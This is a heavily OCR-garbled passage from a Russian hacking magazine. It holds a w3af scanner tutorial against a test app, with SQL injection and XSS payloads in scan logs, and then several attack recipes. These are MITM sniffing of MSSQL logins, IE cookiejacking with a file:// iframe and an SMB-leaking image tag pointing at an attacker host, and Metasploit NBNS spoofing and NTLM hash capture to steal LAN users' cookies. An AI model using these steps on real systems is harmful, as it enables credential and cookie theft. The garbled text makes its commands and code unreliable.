ходящий для твоих нужд плагин. 

9 . АиіЬ-плагины берутна себя весь процессуправления поль- 
зовательской сессией:авторизируются в веб-приложении, 
проверяют, чтобы сессия оставалась валидной, и выполняют в 
конце сканирования корректный выход из веб-приложения. Это 
очень удобно. Ещё совсем недавно не было удобной возможности 
сканировать пользовательские части веб-приложений, то есть 
те, что находятся за авторизацией. Да, можно был о указать ѵѵЗаІ" 
использовать предварительно полученную из браузера куку, но 
это не самый удобный способ. Сейчас в составе ѵѵЗа^ всего один 
аиіЬ-плагин, но он подойдёт для большинства случаев. Да и не 
забывай, что мы имеем дело с фреймворком, и можно написать 
такой плагин практически для любой формы аутентификации: 
5М5, токены ит.п.Утебя в рукахвся мощьРуіЬоп! 



СКАНИРУЕМ ВЕБ-ПРИЛОЖЕНИЕ 

Теперь, когда мы немного разобрались с архитектурой ѵѵЗаС настало 
время увидеть его в действии. Специально для демонстрации я на- 
писал простое, но очень «вебдванольное» приложение социальной 
направленности под названием Іиег. Да, это сервис для ведения 
микроблогов, и, я надеюсь, он станеттаким же популярным, как его 
ограниченный 140 символами на одно сообщение старший брат. :) 
Тестовое веб-приложение обладает следующими свойствами: 

• основано на ЕАМР(ипих-АрасЬе-Му50Е-РНР); 

• имеетфункцию поиска и сервис приватных сообщений; 

• полноценный доступ кфункционалу приложения предоставляется 
тол ько зарегистрированным и авторизованным пользователям; 

• активно использует АЗАХ; 

• имеет, чертпобери, уязвимости! 

ХОЛОДНЫЙ ЗАПУСК 

Для начала давай просканируем наше веб-приложение без авториза- 
ции — просто натравим на него сканер. В ѵѵЗаі" есть два (вообще, уже 
три, но это пока небольшой сюрприз) интерфейса: 

• дікііі — графический, основанный на тулките 6ТК; 

• сопзоіеііі — хакерский III для консольных старожилов (конечно 
же, судебным автозавершением команд). 

Будем использовать первый из них. Для запуска бІІІ-версии на- 
бираем в консоли «./ѵѵЗа1"_диі» и видим что-то похожее на изображен- 
ное на скриншоте 1. Главное окно разделено на несколько секций: 
профиль, цель, плагины и тулбар. Немного расскажу о профилях. 




Структура веб-приложения 
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Результаты сканирования ѵѵЗаТ 

Как можно догадаться, это именованные наборы настроек, которые 
можно загружать в ѵѵЗаІ". По сути, это іпі-файлы, в которых ты можешь 
сохранять полюбившуюся тебе конфигурацию ѵѵЗаб в том числе те- 
стируемый ІІРІ, выбранные и настроенные плагины, соге-настройки 
и многое другое. Например, для сканирования Іиег я создал простой 
профиль под названием Му РгоЛІе, далее подключил в нем сіізсоѵегу- 
плагины ѵѵеЬЗрісІег и рукіо (портзнаменитого Мікіо на РуіЬоп), пару 
дгер-плагинов для поиска ООМ Х55 и несколько плагинов для поиска 
Х55- и 501-инъекций. Чтобы начать сканирование, нажимаем 5іагІ 
и ждем несколько минут, пока не появятся первые результаты. Кста- 
ти, мы всегда можем наблюдать за действиями ѵѵЗаІ" на вкладке код, 
куда в реальном времени выводятся информационные сообщения 
от ядра и плагинов. Ход процесса отображается через прогресс-бар 
и другие идентификаторы. 

Примерно через 20 минут сканирование завершается. Посмотрим, 
что удалось найти ѵѵЗак Помимо ошибок конфигурации Апача и кучи 
подозрений на ООМ Х55, сканер обнаружил несколько Х55! Одна 
из них, в/іпбех.рЬр, представляет для нас особый интерес, осталь- 
ные мы пока отложим. Плагин Рукіо, в свою очередь, обнаружил 
доступную страницу статуса АрасЬе и рЬріпЬ-скрипт АезкрЬр. Другие 
плагины установили название и версию используемого веб-сервера 
и веб-фреймворка. В нашем случае это АрасЬе/2.2.16 на ОеЬіап ОМО/ 
Ыпих и язык программировани РНР. Другая полезная фишка, которая 
позволяет нам лучше понять структуру веб-приложения, — это вклад- 
ка ОРІ5 с древовидной картой веб-приложения и ее графическим 
представлением. Здесь же можно просмотреть все НТТР-транзакции, 
сгенерированные в рамках сканирования. 

ПЕНТЕСТИНГВЕБ2.0 

Сейчас уже никого не удивишь играми, графическим редактором 
или видеозвонками через веб-браузер. Неотъемлемой частью 
интернета стали веб-приложения, в которых логика выполнения 
запрограммирована на стороне клиента с активным использовани- 
ем ЗаѵаЗсгірС АЗАХ, 350М, НТМ15 и других названий и аббревиатур. 

:) Такой насыщенный комплекс технологий всё сильнее затрудняет 
автоматизированное тестирование безопасности веб-приложений. 
Прошли былые времена. Это история уже не о тестировании 
обычного веб-сайта с множеством страниц вида /агІісІе.рЬр?ісІ=68, 
на которых, в свою очередь, есть множество ссылок, форм и тому 
подобного «мяса» для веб-паука. Нажав, как обычно, <СігІ-СІ>, 
чтобы посмотреть НТМІ-код, ты увидишь месиво из огромного куска 
ЗаѵаЗсгірІ и немного традиционного НТМІ. Подобный «сайт» очень 
часто не по зубам веб-пауку, построенному по классической модели. 
Это вообще очень интересное направление для развития средств 
тестирования безопасности веб-приложений. Ведь непонятно, как 
в такой ситуации автоматизированно обойти весь сайт — встраи- 
вать полноценные 35 и рендеринг-движки? Использовать подход, 
подобный 5еІепіит/ѴѴеЬ0гіѵег? 

Для тестирования подобных приложений не обойтись без 
специализированных прокси, таких как 0ѴѴА5Р ѴѴеЬ5сагаЬ и Вигр 




Использование прокси-утилиты в ѵѵЗаТ 

5иіІе, или даже популярного аддона к РігеЬх — Татрег Оаіа. Такие 
«пользовательские прокси» позволяют в реальном времени отслежи- 
вать (и даже изменять) НТТР-трафик между веб-браузером и веб- 
сервером. Конечно, подобный инструмент есть и в комплекте ѵѵЗаТ 
Вернее, таких прокси в нем целых две: 

• сПзсоѵегу-плагинзрісІегМап; 

• интерактивный инструментіпіегсерііпд Ргохудля ручноготестиро- 
вания. 

Для наших целей будем использовать зрісІегМап, который, как мы 
уже разобрались, представляет собой сіізсоѵегу-плагин. Попробуем 
его в деле. Подключаем плагин в главном окне и запускаем сканиро- 
вание. В веб-браузере в качестве прокси прописываем 127.0.0.1:44444 
(я использую для этого аддон РохуРгоху для РігеЬх, позволяющий 
легко управлять проксями и переключаться между ними). 5рісІегМап 
будет запущен до ѵѵеЬ5рісІег, так что последний сможет использовать 
его результаты. Переключившись на зрісІегМап в нашем браузере, не- 
много полазаем по тестируемому веб-приложению. В Іод-табе видим: 

[Моп 30 Мау 2011 12:08:22 АМ МБТ] зрісІегМап ргохѵ І5 гиппіп^ 
оп 127.0.0.1:44444. 

Ріеазе сопб§иге уоиг Ьгоызег 1;о изе 1;Ііе5е ргоху 5е1;1;іп§5 апсі 
паѵі§а1:е 1:Ііе 1:аг§е1: 5І1:е. То ехі1; зрісІегМап р1и§іп ріеазе 
паѵі§а1:е 1:о Іі1;1;р://127.7.7.7/5рісІегМап?1;егтіпа1:е . 

[Моп 30 Мау 2011 12:15:29 АМ М5Т] Тбе изег із паѵі§а1;іп§ 

ІіІігои^Іі 1:Ііе зрісІегМап ргохѵ. 

[Моп 30 Мау 2011 12:15:29 АМ М5Т] Тга р ресІ -РиііаЫе гедиезііз: 
[Моп 30 Мау 2011 12:15:29 АМ М5Т] б1;1;р://1оса1Ііоз1;/іпсІех.рІір 
I Меііііосі: 6ЕТ 

[Моп 30 Мау 2011 12:15:32 АМ М5Т] Іі1;1;р://1оса1Ііоз1;/изег-іп-Ро. 

рбр I МеІіІіосІ: 6ЕТ 

[Моп 30 Мау 2011 12:22:36 АМ М5Т] 5рі іпдесіііоп іп а Му5^^ 

сІаІіаЬазе ыаз -РоипсІ а1і: "ІтІ:1:р://1оса1Ііоз1:/изег-іп-Ро.рІір". 

изіп§ НТТР теііііосі СЕТ. Тбе зеп1; сіаііа ыаз: "ісІ=сІ ' 2"0" . 

Тбіз ѵи1пегаЬі1і1;у ыаз -РоипсІ іп іііе гедиезі; ыііііі ісі 3911. 

[Моп 30 Мау 2011 12:27:10 АМ М5Т] Сгозз 5і1;е 5сгір1;іп§ ыаз 
■РоипсІ аі: "Іі1;1;р://1оса1Ііоз1:/іпсІех.рІір"^ изіп§ НТТР 
шеіііосі СЕТ. Тбе зепі сіаіа ыаз: "1іті1;=15&и=<5сКІРТ> 
а=/ІІ2тЕ/%0Аа1ег1;(а.зоигсе)</5СКіРТ>". Тбе тосіібесі рагашеіег 
ыаз "и". Тбіз ѵиІпегаЬіІііу а-р-Ресіз АН Ьгоызегз. Тбіз 
ѵиІпегаЬіІіІіу ыаз -РоипсІ іп іііе гедиезі: ыіііі ісІ 4042. 

Как видно из лога, чтобы остановить работу зрісІегМап, необхо- 
димо перейти на специальный адрес, после чего ѵѵеЬ5рісІег и другие 
плагины примутся за дело. Так, аудит-плагины обнаружили 501- 
и Х55-инъекцию! Первая дыра, оказавшаяся как раз в АІАХ-запросе, 
была упущена во время первого сканирования. 

Добавлю немного про эксплуатацию найденных багов. ѴѴЗаі" умеет 
эксплуатировать некоторые виды уязвимостей и, к примеру, может 
предоставить тебе заветный шелл на целевой машине. Для эксплуа- 
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тации обнаруженной уязвимости надо просто перетащить соответ- 
ствующий эксплоит на вкладке Ехріоіі на уязвимость. Для эксплуа- 
тации 501-инъекций используется наверняка знакомый тебе 5ЯІтар 
( здІтар.зоигсе^огае.пеО . встроенный в ѵѵЗаЕ 

РУЧНОЕ ТЕСТИРОВАНИЕ 

Отправить НТТР-запрос в нормальной операционной системе можно 
с помощью множества способов: Теіпеі, сІІРІ, ѴѴдеІ, РуіЬоп + игІІ ІЬ, 
в конце концов, :) — выбирай, что больше по душе. В ѵѵЗаІ" для этого 
предусмотрены специальные удобные инструменты. Послать пачку 
однотипных НТТР-запросов с разными значениями одного из пара- 
метров? Пожалуйста! Генерировать соответствующие токены можно 
на том же РуіЬоп. С помощью редактора НТТР-запросов, в котором 
есть даже простая подсветка НТТР-синтаксиса, можно отправлять 
одиночные запросы. Часто возникает необходимость выполнить 
кодирование какой-нибудь строки в ІІРІ или просто посчитать М05- 
сумму. Конечно, можно быстро набрать «есЬо -п "асіпгііп" I ппсібзипп» 
в консоли, но использовать для этого встроенный кодировщик немно- 
го удобнее. При раскрутке очередной слепой 501-инъекции важно 
различать между собой ответы веб-сервера, для чего тебе наверняка 
пригодится встроенный сІіІ'Г Ну и наконец, если ты «вайтхат» или про- 
сто аудитор безопасности, то заказчику пентеста надо показать, как 
«работает» уязвимость, используя возможность экспорта запросов 
в форматы НТМІ, АЗАХ и РуіЬоп. Иными словами, можно сказать: «От- 
кройте вот эту форму, нажмите „Сабмит" и смотрите, как появляется 
35-сообщение...» 

Рассмотрим типичный сценарий использования этих инструмен- 
тов. Запускаем прокси и шаримся по исследуемому веб-приложению 
(не забываем включить проксирование трафика в браузере). 

На вкладке Нізіогу видим отображаемый в реальном времени НТТР- 
трафик между браузером и сервером. В случае с более мощным при- 
ложением, например чатом, транзакций будет значительно больше. 

В такой ситуации как нельзя кстати будет хороший фильтр: с его 
помощью можно, к примеру, выводить только транзакции с такими за- 
просами, которые содержат параметры в строке «Запросы» и на кото- 
рые был получен 2хх-й ответ. 

Вернемся к нашему приложению. Во время навигации по нему 
замечаем, что при наведении на аватар пользователя появляется 
всплывающее «окно» с информацией об этом пользователе. Эта 
информация выдается в результате обычного АЗАХ-запроса к 
/и5ег-іпЬ.рЬр?ісІ=1, что видно в истории запросов. Давай протестиру- 
ем этот скрипт на уязвимости. Для нашего запроса в меню выбираем 
«Аисііі гедиезі ѵѵііЬ...» — нас интересует, есть ли там 501-инъекция. 




Получаем шелл через 501-инъекцию 



Бинго! Обнаружена классическая 501-инъекция. :) Какты уже дога- 
дался, это запускаются всё те же плагины, которые ты выбираешь при 
обычном сканировании. 

Для поиска «слепых» скулей тоже есть специальные плагины. Вы- 
ключим вывод ошибок в настройках РНР и попробуем задетектить тот 
же баг, но уже вслепую. С помощью НТТР-редактора посылаем пару 
запросов к нашему веб-приложению: /и5ег-іп^о.рЬр?ісІ=1 и /изег-іпЬ. 
рЬр?ісІ=1%2Ы, а затем передаем результаты средству для сравнения 
транзакций. В результате при выполнении 501-запроса срабатывает 
простейшее алгебраическое выражение, и мы получаем два разных 
ответа (информация для разных пользователей). Дальнейшим шагом 
может стать всё та же эксплуатация скули. 

оитро 

ѴѴЗаІ" — это действительно мощный фреймворкдля тестирования 
безопасности веб-приложений. Рассказывать о нем можно долго, 
поэтому я ставил перед собой задачу показать его в действии. 

Важно, что это не просто очередной сканер безопасности, а именно 
фреймворк, большое количество дополнений тому доказательство. 
Ктомуже для человека, на базовом уровне знающего веб и РуіЬоп, 
не составиттруда добавить недостающий функционал или проверку. 
Кстати, как и любому свободному проекту, ѵѵЗаІ" нужны новые раз- 
работчики, тестировщики и просто активные пользователи. Кого 
это заинтересовало, добро пожаловать в соответствующий список 
рассылки ( уѵЗаГзоигсеЬгде.пеі ) либо на ІРС-канал #ѵѵЗаІ" в сети 
Ргеепосіе. ^ 
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Модель работы классического сканера уязвимостей Утилита из состава ѵѵЗаІ для сравнения НТТР-транзакций 
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Алексей «бгеепОод» Тюрин, Оідііаі Зесигііу (іѵѵіиег.сот/апіуигіп) 




ОТСНИФАТЬ ПАРОЛЬ ПРИ АУТЕНТИФИКАЦИИ В М5501 



ЗАДАЧА 



РЕШЕНИЕ 

МІСГ050Й 501 зегѵег — это одна из самых распространенных СУБД. 
Давай рассмотрим две ее особенности. 

1 . Каки многие другие продукты МісгозоЙ, 501 зегѵег предлагает 
два вида аутентификации: іпіедгаіесі (зідп-оп),тоестьаутенти- 
фикацию по виндовой учетной записи, и паІіѵе,тоесть классиче- 
скую, по логину и паролю. Оба способа используются довольно 
часто. 

2 . По дефолту данные, передаваемые по сети, практически 

не шифруются. Если точнее, то шифруется процесс аутентифи- 
кации пользователя, а сами данные — нет. Конечно, для атаки 
этого было бы достаточно. Зачем нам логин и пароль, если мы 
можем на лету поменять запрос или получить данные, всего лишь 
устроивагр-зрооЯпд между сервером и клиентом?Затем, что это 
не самое простое дело — подменять что-то налету. Поэтому по- 
пытаемся вытащитьлогин и пароль. 

Не так давно некто под ником Шгкі изучил этот вопрос ( ЬШу/ 
зВа07г ]. Посмотрим, что же он выудил. Для начала то, что дан- 
ные М5501 передаются в формате ТаЬиІаг ОаІаЗігеат ргоіосоі 
[ ЫМу/гЗоУРР ]. Но сам этот протокол не поддерживает шифрова- 
ние. Как же так? Откуда зашифрованные пакеты авторизации? 
После непродолжительных мучений с ѴѴігезЬагк Шгкі обнаружил 
довольно интересную вещь: для шифрования здесь использу- 
ется обычный 551 (с самоподписанным сертификатом), который 
работает внутри Т05. Нестандартное решение. Но это не так 
важно. Самое интересное — это настройка Т05-соединения, 
так называемого пакета РРЕІОСІМ. Он задает разнообразные 
настройки и в том числе указывает, будет ли использоваться 
шифрование. За шифрование отвечает поле ЕМСРУРТІОМ, кото- 
рое может принимать следующие значения: 



1 . Шифрование доступно, но отключено: ЕМСРУРТ_ОРР — 0x00. 

2 . Шифрование доступно и включено: ЕМСРУРТ_ОМ — 0x01. 

3 . Шифрование недоступно: ЕМСРУРТ_М0Т_5С1Р — 0x02. 

4 . Шифрованиетребуется: ЕМСРУРТ_РЕО — 0x03. 

По дефолту устанавливается значение ЕМСРУРТ_ОРР. Несмо- 
тря на название, шифрование при таком значении используется, 
но только для процесса. А вот когда стоит ЕМСРУРТ_М0Т_5С1Р, 
шифрование не используется совсем. Таким образом, мы вполне 
можем осуществить классическую МіТМ-атаку и, подменив данные 
всего лишь в одном пакете, полностью отключить шифрование 
и отснифать аутентификационные данные. 

Кстати, автор этого исследования довел всё до логического 
конца — создал модуль для Меіазріоіі Ргатеѵѵогк, который всё 
за нас и сделает. Только, думаю, здесь стоит отметить одну особен- 
ность. В описываемом случае модуль не меняет данные на лету, 
а поднимает ТСР-порт, и только с него данные редиректятся 
на М5501-сервер за счет еще одного соединения, созданного уже 
атакующим, что, тем не менее, не создает особых проблем. Всё, что 
требуется, — это организовать редирект трафика, приходящего 
на хост атакующего после агр-зрооЛпд-атаки, на соответствующий 
локальный порт. Но и эту задачу Шгкі автоматизировал, добавив 
в свой модуль небольшой зЬеІІ-скрипт. 




Выбор метода на основании флагов, установленных у клиента и сервера 
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ЕА5У НАСК 



УГНАТЬ КУКИСЫ С помощью иі-ПЕ0ПЕ55ІМ6 



ЗАДАЧА 



РЕШЕНИЕІ 

В декабрьском номере ][ мы познакомились с такой вещью, как 
сІіск]аскіпд. Статья была очень полезной, но автор не упомянул об 
одном замечательном трике. На самом деле название сІіск]аскіпд 
не совсем точно отражает суть атаки, и мне кажется, что иі- 
гесігеззіпд — это более правильное понятие. И техника, которую я 
опишу ниже, — самое яркое тому подтверждение. 

Итак, позволь представить тебе соокіе]'аскіпд. Впервые об этом 
технике рассказал Розагіо Ѵаіоиа на НІТВ в Амстердаме в 2011 
году. Потенциал техники огромен — просто представь, что с ее по- 
мощью можно похитить куки от любого сайта, даже от защищенно- 
го НТТР5-протоколом! Однако здесь есть небольшое ограничение: 
работает она только в ІЕ (но зато во всех версиях). Теперь давай 
посмотрим, что же предлагает нам этот ИБ-специалист. 

Во-первых, он использовал О-бау, которая имеется во всех 
версиях ІЕ. С виду это не такая уж и страшная дырка, а потому ее 
не особо стремились пропатчить. Как ты уже знаешь, в ІЕ есть 
такая фича, как разделение на зоны: Іпіегпеі, Іпігапеі, доверенные 
узлы. В разных зонах действуют разные настройки безопасности. 
Например, описанная выше автоматическая МТЕМ-аутентфикация 
действует для узлов зоны Іпігапеі и выше. Вот список зон, отсо- 
ртированных в порядке уменьшения привилегий: 

Іосаі Масіііпе 2опе 

Іосаі Іп1:гапе1: 2опе 

Тгизііеб 5і1:е5 2опе 

Іп1іегпе1: 2опе 

Ке5І;гіс1;еб 5і1;е5 2опе 

С безопасностью и зонами связан еще один момент — правила 
кросс-зонного взаимодействия. Согласно самому общему прави- 
лу, менее привилегированная зона не может взаимодействовать 
с более привилегированной. Таким образом, вызов кода <і-Ргате 
5гс="б1е://с:/Ьоо1;.іпі"> со страницы зоны интернет приведет 
к ошибке доступа. 

Уязвимость 0-бау состоит в том, что кросс-зонная политика 
не действует для определенных файлов, а именно для файлов 
куки. Таким образом, на страницу сайта зоны интернет можно 
вставить следующий фрейм: 

<і-Ргате 5гс="б1е:///С://0оситеп1:5 апб 5е1:1:іп§5/ 
%и5ег_пате%/Соокіе5/%и5ег_пате%@§оо§1е[1] </і-Ргате> 

Здесь %и5ег_пате% — это имя пользователя в ОС. Куки же 
у каждого пользователя свои, поэтому хранятся они в личных пап- 
ках. Пример, иллюстрирующий чтение кукисов Ооодіе, ты сможешь 
увидеть на скриншоте. 

Во-вторых, кроме 0-бау-бага, автор использовал специальную 
технику сііск)аскіпд'а под названием сопіепі ехігасііоп (представ- 
лена Полом Стоуном на ВІаскНаІ Еигоре — 2010, аоо.дІ/28УМѵѵ ]. 
Зачем? Хотя мы и подгрузили в Ногате файл с кукисами, однако 
получить доступ к данным в нем мы не можем. Здесь действует 
кросс-доменная политика, ведь наш сайт находится где-то в сети, 
а в И'гаппе у нас сидит ІосаІЬозІ пользователя. 

Суть этой специальной техники достаточно проста. Все совре- 
менные браузеры поддерживают бгад & бгор, с помощью которого 
пользователь может перенести данные с одного сайта на другой. 
Таким образом, юзер, по сути, копирует данные в одном месте 
и вставляет в другое. Кросс-доменным политикам здесь придраться 
не к чему. Так вот, сопіепі ехігасііоп — это, проще говоря, несколько 
извращенный бгад & бгор. Заманив на ядовитый сІіск)аскіпд-сайт 
нашужертву, мы предлагаем ей, например, поиграть в игру. Ее смысл 




Обход кросс-зонной политики и доступ к локальным кукисам из зоны интернет 



— перетащить один элемент (в примере Розагіо это мячик) в другой 
(сетка). Под мячик мы прячем наш Ногате с кукисами, а на самом 
сайте создаем обработчик для переносимых данных. Но и это еще 
не всё. Нашему Ногате мы добавляем свойство зсгоіізрееб с большим 
значением. Это необходимо для того, чтобы клик, совершаемый 
пользователем, превращался в операцию выделения за счет само- 
стоятельного перемещения (проскролливания) іі'гаппе из самого 
верха в самый низ. Таким образом, получается, что пользователь во 
время клика на самом деле выделяеттекст в Ногате, а перемещая 
мячик в корзину, перемещает этот текст бгад & бгор'ом, в итоге пере- 
давая текст хакеру. Возможно, что на словах всё это звучит не очень 
понятно, но как только ты посмотришь видео на сайте Розагіо Ѵаіоиа 
( ЬіТІу/іМхѵТЬ ). то сразу поймешь логику метода и, в частности, техни- 
ки сопіепі ехігасііоп, даже если ты не знаком с баѵаЗсгірЕ 

Думаю, что теперь общая идея атаки ясна. Однако у нее есть 
несколько нюансов. Во-первых, эта атака работает на всех ОС 
ѴѴіпбоѵѵз, что и создает проблему :). Файлы кукисов в ХР и в 
ѴізІа/7 лежат в разных местах. Для ХР это С://0оситеп-1;5 апб 
5е'1;'1;іп§5/%и5еп_пате%/Соокіе5, а для более новых версий винды 

— С:/изеп5/% изеп_пате %/Арр0а'1;а/коатіп§/Міспо5о-Р'1:/1лІіпбоѵ\/5/ 
Соокіез. Тем не менее, эта «проблема» решается достаточно просто, 
ведь большинство браузеров отправляют в каждом запросе заголо- 
вок Озег-АдепС который очень часто включает в себя и версию ОС. 
Кроме того, для определения версии ОС можно воспользоваться тем 
же ^аѵа5сгірС Во-вторых, как ты, я думаю, заметил, нам необходимо 
знать имя пользователя на его компьютере, и это главная про- 
блема. Для ее решения можно попытаться заставить пользователя 
подключиться по протоколу 5МВ. При подключении по нему клиент 
передает имя пользователя наряду с другими полями. Для этого 

на ядовитую страницу требуется добавить воттакой простейший 
код: <іт§ 5гс="\\а1;1;аскег.Ііо5І;.сот\апу.др§"></іт§>. 

Конечно, еще потребуется поставить обработчик запросов 
на 445 порт, а затем организовать его взаимодействие с ѵѵеЬ- 
сервером. Как видишь, описанный метод просто шикарен! Однако 
возможности его использования чаще всего ограничивает филь- 
трация такого трафика на сетевых устройствах. К тому же здесь 
встает еще одна проблема. На дворе уже весна 2012-го, а МісгозоЙ 
пофиксила уязвимость в ІЕ еще в начале осени 2011-го. Кроме того, 
МісгозоЙ внесла изменения в наименование кукисов в файловой 
системе. Теперь их названия лишились понятного удобочитаемого 
вида изег_патегасІоппаіп[соипІег].ІхІ и стали похожи на буквенно- 
цифровые рандомы вроде 87ТѴЕВОѴѴ.ІхЕ Поэтому обратиться к ним 
напрямую так просто уже не получится. Впрочем, по статистике, 
очень малое число пользователей заблаговременно обновляет 
свои браузеры, особенно если речь идет об ІЕ. 
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СОБРАТЬ ИНФОРМАЦИЮ 



ЗАДАЧА 



РЕШЕНИЕ 

Сбор информации является одним из важнейших этапов при про- 
ведении аудита безопасности (ну или атаки). Ведь нам необходимо 
найти самое слабое место и затем попытаться захватить через него 
всю систему. Но зачем искать сложный путь, если самым слабым 
местом любой, даже самой защищенной системы является чело- 
век? Ты наверняка знаешь о существовании такой замечательной 
вещи, как социальная инженерия. Ее результативность напрямую 
зависит от доступной информации о человеке, поэтому тысячи 
специалистов и проводят различные исследования на эту тему. 
Однако в России такой тенденции пока что не наблюдается, так 
как наши пользователи сидят в основном только в Одноклассниках 
и ВКонтакте, да и процесс информатизации еще просто не дошел 
до большинства ведомств. В любом случае я думаю, что тебя за- 
интересует ссылка такепзі.ез/зи . Автор этой страницы не поле- 
нился собрать в одном месте неплохую коллекцию всевозможных 
онлайн-сервисов, которые могут пригодиться тебе в процессе 
взлома или пентеста, чтобы получить всю необходимую информа- 
цию как о человеке, так и о всей подопытной системе. 




НАЙТИ АЛЬТЕРНАТИВУ 0Н5 И ПРОСПУФИТЬ НЕТВІ05 



ЗАДАЧА 



РЕШЕНИЕ 

Всем нам известно, что для определения ІР-адресов по именам 
используется протокол 0М5. Протокол проектировался без особой 
заботы о безопасности (тогда существовали более важные зада- 
чи), поэтому в настоящее время в нем есть множество недостатков 
с точки зрения безопасности. Однако на смену ему идет 0М55ЕС, 
и я надеюсь, что ситуация изменится в лучшую сторону. Сами не- 
достатки 0М5 наиболее сильно проявляются в локальных сетях, 
особенно если мы можем проводить атаки типа агр-роізопіпд, 
позволяющие просматривать и модифицировать трафик, которым 
обмениваются жертва и сервер. Но давай предположим, что 
по каким-то причинам всё это нам недоступно, хотя мы и находим- 
ся в одной локалке с жертвой. Пусть, например, в сетке при- 
сутствует некая Ю5, и мы совсем не хотим, чтобы кто-то заметил 
нашу хакерскую активность. Тогда нам нужно действовать тихо, 
используя только стандартные возможности протоколов. Уточню 
задачу. Нам необходимо перехватить куки, передаваемые пользо- 
вателем на абстрактный сайт XXX. СОМ. Изначально может пока- 
заться, что задача не имеет решения, но давай рассмотрим, каким 
образом ОС ѴѴіпбоѵѵз определяет ІР-адрес сайта. Первым делом 
система проверяет статическую привязку ІР к именам, хранящим- 
ся в файле Ьозіз (С:\ѴѴіпсІоѵѵз\5узІепп32\сІгіѵегз\ек\ЬозІз). Далее, 



если в файле нет привязок, производит запрос к 0М5-серверу. За- 
тем ѴѴіпсІоѵѵз использует такую штуку, как МеіВІОЗ Мате Зегѵісе. 
Здесь следует уточнить, что МеіВІОЗ входит в ѴѴіпсІоѵѵз по дефолту, 
а МеіВІОЗ Мате Зегѵісе (МВМ5) — это тот же протокол, только 
предназначен он для установки соответствия между МеіВІОЗ- 
именами и ІР-адресами. В процессе работы этот протокол либо 
использует специальный ѴѴІМЗ-сервера, либо отправляет широко- 
вещательный запрос в сеть (думается, теперь идея атаки понятна). 
Но вернемся к еще одному важному моменту — 0М5-запросу 
к серверу. Если сервер ответит пользователю, то запрос по МВМ5 
уже не будет отправлен. А как же 0М5-серверу не ответить, если 
интересующий пользователя сайт XXX. СОМ имеет 0М5-запись? 
Здесь мы можем воспользоваться возможностями современных 
браузеров: поиском из адресной строки и подстановкой доменов 
верхнего уровня (.сот, .ги). Как именно? Сейчас пользователи 
привыкают вводить то, что их интересует, прямо в адресную стро- 
ку, но браузеры не всегда могут понять, хочет ли пользователь 
что-то найти в поисковике или просто открыть сайт. Есть, конечно, 
определенные паттерны (например, пробелы в адресной строке), 
но гораздо чаще браузеры в первую очередь резолвят имя только 
упомянутым выше способом. Что еще интересней, при отправке 
0М5-запроса к введенной пользователем строке добавляется 
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Запрос ІІРІ в браузере порождает пачку различных запросов для резолва имени 
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МВМ5-спуфинг в действии 



определенный суффикс, в результате чего получается полное до- 
менное имя. 

Теперь нам необходимо подделать ответ на МВМ5-запрос. Для 
этого нужен Тгапзасііоп Ю из МВМ5-запроса. Но, какуже было 
сказано выше, этот запрос чаще всего является широковещатель- 
ным, а так как мы находимся в той же локалке, то никаких проблем 
с его получением нет. К нашей радости, для спуфинга в М5Р уже 
присутствует соответствующий модуль. Вот краткая схема дей- 
ствий: 

1 . Загружаем модульдля МеіВІОВ-суппинга: изе аихіИапу/зроо-Р/ 
пЬп5/пЬп5_пе5роп5е. 

2 . Выставляем регэпс ответов на запросы: Бе'І: КЕСЕХ *§оо§1е*. 

3 . Указываем, какой ІР-адрес подставлять: зе'І: зрообр ха.кер. 
ІР.асІсІпеББ. 

4 . Запускаем: пип. 

Теперь сделаю небольшое отступление. Создатель этого моду- 
ля (Тіт Месііп) предлагал использовать его совершенно для других 
целей (доо^дШі209), а именно для банального сбора МТІМ-хешей. 
Если точнее, то после запуска вышеуказанного модуля от браузе- 
ра приходит множество запросов, причем чаще всего получается 
спуфить короткие имена (типа такака), а не длинные (такака. 
сот). С учетом логики работы ѴѴіпсІоѵѵз короткие имена причисля- 
ются к зоне интранет (не интернет!). А эта зона в ІЕ считается «до- 
веренной», и в ней действуют гораздо менее грозные настройки 
безопасности. К примеру, здесь разрешена автоматическая аутен- 
тификация на сайтах. Таким образом, мы можем запустить модуль 
для сбора МТІМ-хешей по НТТР (хотя можно и по 5МВ): 

1 . Загружаем модуль для снифинга: изе аихіііапу/зепѵеп/ 
с а рі; и пе/ Іті; р_п-1; 1 ш . 

2 . Страница, где будетпроизводиться запрос: зеі; ІІКІРАТН. 

3 . Порт, где поднимется веб-сервер: зеі; 5КѴР0РТ 80. 



4 . Запускаем: пип. 

Вернемся к краже кукисов. Итак, используя МВМ5-спуфинг, мы 
можем подменить какой-либо рандомный запрос. Но нам нужны 
кукисы именно с XXX. сот, а потому мы проворачиваем неболь- 
шой трюк — поднимаем веб-сервер со страничкой, содержащей 
скрытый фрейм (можно заюзать ^аѵа5сгір^), а уже в этом фрейме 
загружаем XXX. сот. Однако нам надо не просто загрузить XXX. 
сот, но еще и сделать так, чтобы браузер не нашел его с помощью 
О N5 и начал использовать для поиска только МВ N5. Очень важно, 
чтобы браузер продолжал считать проспуфленный домен тем же 
самым доменом, иначе в силу вступят кросс-доменные политики 
и никаких кукисов мы не увидим. Так как указанная методика 
разресерчивалась как раз во время написания этого текста, то 
единственным достойным вариантом стало обращение к несуще- 
ствующему поддомену атакуемого сайта. 

Теперь можно вывести общий алгоритм атаки: 

1 . Устанавливаем МВМ5-спуфингна все имена. 

2 . Поднимаем ѵѵеЬ-сервер с легированием входящих запросов 
(чтобы собирать кукисы) и фреймом, ссылающимся на несуще- 
ствующий поддоменХХХ.сот (например, азсІазсІазсІ.ХХХ.сот). 

3 . Жертва, которая ввела что-то в адресную строку браузера, спу- 
фится по МВ N5 и редиректится на хост хакера. 

4 . Браузеравтоматом резолвитазсІазсІазсІ.ХХХ.сот, и, опятьже, 
спуфится по МВМ5. 

5 . Браузер отправляет кукисы XXX. сот на азсІазсІазсІ.ХХХ.сот, то 
естьнахостхакера. 

Таким образом, мы можем получить кукисы от множества 
сайтов. Единственное ограничение здесь в том, что куки должны 
быть установлены не на конкретный узел (XXX. сот), а на домен 
(.ХХХ.сот). 



ПЕРЕХВАТИТЬ ТРАФИК НА 10СА1Н05Т ПОД ѴѴІМ00ѴѴ5 



ЗАДАЧА 



РЕШЕНИЕ 

Недавно я столкнулся с невозможностью пропускать трафик 
через прокси при системных обращениях к ІосаІЬозІ или к лупбэку 
— 127.0.0.1. Почему системных? Потому, что настройки ІЕ, касаю- 
щиеся прокси, используются большинством ПО в ѴѴіпсІоѵѵз. Напри- 
мер, РуіЬоп при использовании игІІіЬ2 автоматом берет прокси 
